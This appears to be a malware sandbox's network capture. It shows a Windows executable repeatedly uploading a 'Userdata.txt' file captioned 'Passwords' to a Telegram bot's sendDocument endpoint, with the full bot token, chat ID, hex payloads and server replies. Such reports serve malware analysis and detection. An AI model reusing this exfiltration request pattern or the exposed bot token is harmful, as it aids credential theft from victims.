                                                                                                          2025-01-10 22:12:43 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 61 62 62 32 38 36 37 37 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd33abb28677f1Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:43 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:43 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:43 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 36 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44811,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547163,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          30192.168.2.950032149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:45 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd33c5920c0b5c
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 22:12:45 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 63 35 39 32 30 63 30 62 35 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd33c5920c0b5cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:45 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:45 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:45 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 36 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44812,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547165,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          31192.168.2.950034149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:46 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd33df5e6a49aa
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 22:12:46 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 64 66 35 65 36 61 34 39 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd33df5e6a49aaContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:47 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:47 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:47 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 36 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44813,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547167,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          32192.168.2.950036149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:48 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd33fe3ac1ecdf
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 22:12:48 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 66 65 33 61 63 31 65 63 64 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd33fe3ac1ecdfContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:48 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:48 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:48 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 36 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44814,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547168,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          33192.168.2.950038149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:50 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd341f90415bea
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 22:12:50 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 31 66 39 30 34 31 35 62 65 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd341f90415beaContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:50 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:50 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:50 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 31 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 37 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44815,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547170,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          34192.168.2.950040149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:51 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd343e3f0cbb2f
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 22:12:51 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 33 65 33 66 30 63 62 62 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd343e3f0cbb2fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:52 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:52 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:52 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 37 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44816,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547171,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          35192.168.2.950042149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:53 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd34647c437859
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 22:12:53 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 36 34 37 63 34 33 37 38 35 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd34647c437859Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 22:12:53 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:12:53 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 535
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 22:12:53 UTC535INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 38 31 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 37 31 37 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":44817,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547173,"document":{"file_name":"U


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          36192.168.2.950044149.154.167.2204431072C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 22:12:55 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd348d28405116
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
